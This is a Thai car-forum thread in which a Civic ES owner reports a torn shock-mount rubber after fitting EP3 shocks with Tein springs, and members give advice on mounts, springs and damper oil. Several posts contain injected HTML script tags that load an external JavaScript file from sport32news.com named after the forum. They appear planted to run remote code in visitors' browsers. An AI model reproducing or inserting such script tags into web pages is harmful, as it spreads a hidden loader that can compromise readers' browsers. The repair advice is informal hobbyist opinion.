ตอบ
kuchouwa

เข้าร่วม: 07 ธันวา 2011
ตอบ: 116

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 159
ให้คำขอบคุณ: 79

ปี: 2004
เสาร์, 21 ธันวา 2013 11:28 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
รับEP3+tein มาใส่เนื่องจากโช้คเดิมเสีย สวยทีเดียวหน้าทิ่มตูดโด่งเพราะรองสเปเซอหลัง ใส่วันแรกทดสอบ นครสวรรค์-น่าน เด้งมากมาย หัวพิงพนักไม่ได้ทีเดียว แต่การเข้าโค้งดีกว่าเดิมอย่างรู้สึกได้ ถึงน่านเปิดกระโปรงดู เบ้ายางขาดตามภาพ ขับกลับจะมีปัญหาหรือเปล่าและต้องแก้อะไรบ้างเพื่อลดการเด้งคัฟ จะเอารถไว้รับคนแก่

ซ้าย
ซ้าย
ขวา
ขวา

แก้ไขล่าสุดโดย เมื่อ เสาร์, 21 ธันวา 2013 12:08, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: popza4  phasit  karnmotocross01 
lordpark

ชื่อเล่น: ปาร์ค

เข้าร่วม: 16 กันยา 2011
ตอบ: 714

Guru ES
Guru ES

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 1517

สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 21 ธันวา 2013 11:32 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
เปลี่ยนเบ้ายางใหม่(แน่นๆ หนึบๆ) +เอาสเปเซอร์ออก(เพราะทำให้โช๊คกระด้าง) 

ถูก-ผิด รอผู้รู้อีกทีครับ
ได้รับคำขอบคุณจาก: kuchouwa  karnmotocross01 
THAM

ชื่อเล่น: ตั้ม

เข้าร่วม: 05 ธันวา 2010
ตอบ: 951

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 946
ให้คำขอบคุณ: 777

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 21 ธันวา 2013 11:43 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
รองสเปเซอร์แบบไหนครับ 
ได้รับคำขอบคุณจาก: kuchouwa  karnmotocross01 
kuchouwa

เสาร์, 21 ธันวา 2013 11:55 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
แบบนี้คัฟ ติดมากับโช้คที่ได้รับมา

Attached File :
ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
ได้รับคำขอบคุณจาก: karnmotocross01 
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 21 ธันวา 2013 13:05 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
รอเก็บข้อมูลด้วยคนคร๊าบบ
Jed_Ped

เข้าร่วม: 26 ตุลา 2013
ตอบ: 199

ได้รับคำขอบคุณ: 198
ให้คำขอบคุณ: 0

ปี: 2005
เสาร์, 21 ธันวา 2013 16:19 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
1. ยางขาดตามสภาพนั้น ถ้าขับไม่หนักมาก พอไปได้อยู่ครับ แล้วค่อยหาเปลี่ยนซะทีหลัง
2. แก้อาการเด้ง ต้องถามก่อนว่าเด้งแบบไหน แบบถ้าจั๊มคอสะพาน เด้งทีเดียวแล้วหยุด อันนี้คือหนึบอยู่ โช๊คยังดีอยู่ แล้วถ้าขับทั่วๆ ไป มันเด้ง ดึ๋งดั๋ง ก็เป็นเรื่องปกติของโช๊คหนึบๆ  ช่วยได้ก็คงต้องหาสปริงนุ่มลงนิดนึงมาใส่ดูครับ ลดอาการเด้งลงได้ ความหนึบยังดีอยู่
แต่ถ้าเด้งแบบ จั๊มคอสะพานแล้วดึ๋งดั็ง 3-4 ที อันนี้โช๊คเน่าแล้วครับ
ได้รับคำขอบคุณจาก: kuchouwa  amnuoi_pipat  NutNicha  phasit  keacobain  karnmotocross01 
RUKCHAI

เข้าร่วม: 23 กันยา 2009
ตอบ: 246

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 176
ให้คำขอบคุณ: 9

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 21 ธันวา 2013 16:48 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
1.เปลียนเบ้าโช็คคู่หน้าใหม่ครับ
2.สเปเซอร์คู่หลังมีผลแค่ความสูงต่ำยังคงไว้ได้ครับ ส่วนอาการเด้งๆมาจากตัวสปริงโหลดนะครับ Tein ค่อนข้างแข็ง และเด้ง กระด้างมาก ลองเปลี่ยนสปริงโหลดที่ให้ความนุ่ม แต่ยังคงความหนึบๆอยู่นะครับ เช่น H&R , Tanabe DF 210 , RSR

ยังไงลองหาข้อมูลเพิ่มเติมดูนะครับ เอาใจช่วยให้รถของคุณยังคงความสวย แต่ยังพร้อมที่จะรับส่งผู้สูงอายุได้นะครับ 
ได้รับคำขอบคุณจาก: kuchouwa  NutNicha  phasit  karnmotocross01 
kuchouwa

อาทิตย์, 22 ธันวา 2013 19:39 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
เป็นเพราะปิงเชียวรึคัฟ ทางลาดยางก็พอรับได้ แต่คอนกรีตนี่เหมือนนั่งเกวียนทีเดว
จั้มคอสะพานก็ไม่มีเด้งนะคัฟ หนึบมาก
แต่กลัวแม่จะรับไม่ไหว มันเด้งดึ๋งๆทั้งทาง กระด้างมาก
ใส่วันเดียวยางเบ้าโช้คขาดนี่ปกติหรือคัฟ
ตอนจอดล้อมันแบะออกอะคัฟ สังเกตุจากยางที่เบ้ามันแหกออกด้วย
เปลี่ยนเบ้าแล้วจะขาดอีกหรือป่าวคัฟ
ได้รับคำขอบคุณจาก: karnmotocross01 
sripasong

ชื่อเล่น: สอง

เข้าร่วม: 09 สิงหา 2011
ตอบ: 232

ได้รับคำขอบคุณ: 250
ให้คำขอบคุณ: 117

ปี: 2003
จันทร์, 23 ธันวา 2013 00:39 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
700 ต่อข้าง อยากแนะนำร้านทำโช็คอีกสักร้านนะครับ ร้านเฟิสโชคชัย4 ซ.71 ผมว่างานโอเคนะ แต่มารยาทก็เหมือนๆกะร้านทั่วไป แต่ผมคิดว่าตรงเสป็คที่ผมต้องการ(ส่วนมากมีแต่รถแพงๆนะ ที่จอดทำอยู่ร้านนี้) ของผมก็สปริงเขียวเหมือนกัน อัดที่อื่นมานั่งกินข้าวมาอิ่มๆ จุกครับ แต่ทำมารอบนี้ มันนิ่มเหมือนรถเดิมๆเลย(ถามหาพี่อ้วน บอกน้องคันซิวิค สีดำ สระบุรีแนะนำมา)
ได้รับคำขอบคุณจาก: kuchouwa  NutNicha  karnmotocross01 
Jed_Ped

จันทร์, 23 ธันวา 2013 09:35 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
kuchouwa พิมพ์ว่า:
เป็นเพราะปิงเชียวรึคัฟ ทางลาดยางก็พอรับได้ แต่คอนกรีตนี่เหมือนนั่งเกวียนทีเดว
จั้มคอสะพานก็ไม่มีเด้งนะคัฟ หนึบมาก
แต่กลัวแม่จะรับไม่ไหว มันเด้งดึ๋งๆทั้งทาง กระด้างมาก
ใส่วันเดียวยางเบ้าโช้คขาดนี่ปกติหรือคัฟ
ตอนจอดล้อมันแบะออกอะคัฟ สังเกตุจากยางที่เบ้ามันแหกออกด้วย
เปลี่ยนเบ้าแล้วจะขาดอีกหรือป่าวคัฟ

- ใส่วันเดียว ยางเบ้าโช๊คขาด คงไม่ใช่หรอกครับ คิดว่าคงขาดมาก่อนแล้ว แต่เพิ่งจะปริออกให้เห็น ลองเปลี่ยนใหม่ดูก่อนครับ
- สปริงก็มีส่วนครับ ในการทำให้เด้ง เพราะมันแข็ง เรื่องค่า k ของสปริง หาอะไรที่ลงตัวยากครับ ต้องหาลองไปเรื่อย เพราะแต่ละคน ก็ใ้ช้โช๊คใช้สปริงต่างกัน อ้อ เคยได้ยินมาว่า tanabe ความนิ่มใกล้เคียงของเดิมๆ นะครับ แต่ผมไม่รู้ว่าถ้านิ่มไปแล้วมันเอาโช๊คอยู่หรือเปล่า ก็ต้องลองดูเอาเอง  อีกอันที่ได้ยินมาเหมือนกันก็ swift ครับ
- อีกส่วนก็ความหนืดโช๊คครับ แต่โช๊คตัวนี้ปรับหนืดไม่ได้ เลยไม่ได้แนะนำอะไร ไม่งั้นก็ต้องอัดน้ำมันใหม่ ให้หนืดน้อยลง ก็จะทำให้นิ่มขึ้นได้ แต่ความหนึบก็ลดลงเหมือนกันครับ

ได้รับคำขอบคุณจาก: kuchouwa  NutNicha  phasit  karnmotocross01 
kuchouwa

พุธ, 1 มกรา 2014 19:31 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
เบ้าโช้คเปลี่ยนแล้วคัฟ ของเทียบ ข้างละหกร้อย ค่าใส่คู่ละร้อย รวมพันสาม

ที่นครสวรรค์โช้คอัพ ข้างบิ้กซีใหม่ ช่างตัดยางรองในที่เป็นเหมือนโรลออกไปชั้นนึง อาการเด้งลดลง

เสร็จแล้ว ไปตั้งศูนย์อีกสองร้อย ช่างบอกที่กินขวา ยางมันเริ่มไปแล้วต้องเปลี่ยน

แต่ทดลองขับมาสองอาทิตย์สังเกตุดู รุสึกว่ายางจะกินในทั้งหน้าและหลัง เป็นผลมาจากโช้คอัพหรือป่าวคัฟ
"<script src="https://sport32news.com/civicesgroup.js">
Jed_Ped

พฤหัส, 2 มกรา 2014 08:31 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
เบ้าโช้คเปลี่ยนแล้วคัฟ ของเทียบ ข้างละหกร้อย ค่าใส่คู่ละร้อย รวมพันสาม

ที่นครสวรรค์โช้คอัพ ข้างบิ้กซีใหม่ ช่างตัดยางรองในที่เป็นเหมือนโรลออกไปชั้นนึง อาการเด้งลดลง

เสร็จแล้ว ไปตั้งศูนย์อีกสองร้อย ช่างบอกที่กินขวา ยางมันเริ่มไปแล้วต้องเปลี่ยน

แต่ทดลองขับมาสองอาทิตย์สังเกตุดู รุสึกว่ายางจะกินในทั้งหน้าและหลัง เป็นผลมาจากโช้คอัพหรือป่าวคัฟ
"<script src="https://sport32news.com/civicesgroup.js">

ดูจากรูป avatar ของคุณแล้ว ล้อห่างจากซุ้มล้อขนาดนั้น ไม่น่าจะกินในเลยนะ
ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า

manawwan

ชื่อเล่น: นัท

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 380

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 291

ศุกร์, 3 มกรา 2014 01:06 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
เก็บข้อมูล"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
kuchouwa

ศุกร์, 3 มกรา 2014 16:08 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
Jed_Ped พิมพ์ว่า:

ดูจากรูป avatar ของคุณแล้ว ล้อห่างจากซุ้มล้อขนาดนั้น ไม่น่าจะกินในเลยนะ

จากภาพคือโช้คเดิมคัฟ  ตอนนี้หน้าทิ่มตูดโด่ง สวยงามดี

แต่ความรุสึกไม่เหมือนเดิม รู้ทุกลายถนนเรย ดึ๋งๆๆๆ

EP3+Tein แข็งจิงไรจิง
Khachi

เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
อาทิตย์, 5 มกรา 2014 06:15 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
ค่า k สปริงของ เทอินไกล้เคียงของเดิมมากครับ อาการเด้งน่าจะมาจาก โช็คเอาสปริงไม่อยู่หมายถึงโชคมันหนึดไม่พอครับ
อัดน้ำมันเพิ่มก็จะชาวยได้ แต่ต้องแลคมากับความกระด้าง

อีกอย่างไม่รู้ที่ว่าเด้งเนี่ย มันเด้งขนาดไหน ส่วนมากก็จะมีเด้งบ้างนะครับแต่ไม่มาก ผมก็เป็นตอนใช้โชคสตัสใหม่ๆ เมารถตัวเองเลย
ไปสภาพไม่ทัน ตอนนี้ชินแล้วครับ
ได้รับคำขอบคุณจาก: karnmotocross01  kuchouwa 
karnmotocross01

ชื่อเล่น: กานต์

เข้าร่วม: 01 กันยา 2012
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 814
ให้คำขอบคุณ: 34349

อาทิตย์, 5 มกรา 2014 09:38 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
ช่วงล่างนี่ยุ่งยากเหมือนกันแฮะ อยากหล่อต้องทำใจ
ได้รับคำขอบคุณจาก: kuchouwa 
kuchouwa

อังคาร, 7 มกรา 2014 13:45 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
Khachi พิมพ์ว่า:
ค่า k สปริงของ เทอินไกล้เคียงของเดิมมากครับ อาการเด้งน่าจะมาจาก โช็คเอาสปริงไม่อยู่หมายถึงโชคมันหนึดไม่พอครับ
อัดน้ำมันเพิ่มก็จะชาวยได้ แต่ต้องแลคมากับความกระด้าง

อีกอย่างไม่รู้ที่ว่าเด้งเนี่ย มันเด้งขนาดไหน ส่วนมากก็จะมีเด้งบ้างนะครับแต่ไม่มาก ผมก็เป็นตอนใช้โชคสตัสใหม่ๆ เมารถตัวเองเลย
ไปสภาพไม่ทัน ตอนนี้ชินแล้วครับ

เหมือนจะชินแล้วคัฟ
karnmotocross01 พิมพ์ว่า:
ช่วงล่างนี่ยุ่งยากเหมือนกันแฮะ อยากหล่อต้องทำใจ

ช่วงล่างของคนเบี้ยน้อยหอยน้อย ยุ่งยากคัฟ <script src="https://sport32news.com/civicesgroup.js"></
akkarin_c

ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 8 มกรา 2014 13:10 - ยางเบ้าโช้คขาด ถ้าขับต่อจะมีปัญหารึเปล่า
น่าจะจัดเบ้าแท้ไปเลยนะครับ ศูนย์ประมาณ 800 เอง
ได้รับคำขอบคุณจาก: kuchouwa 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.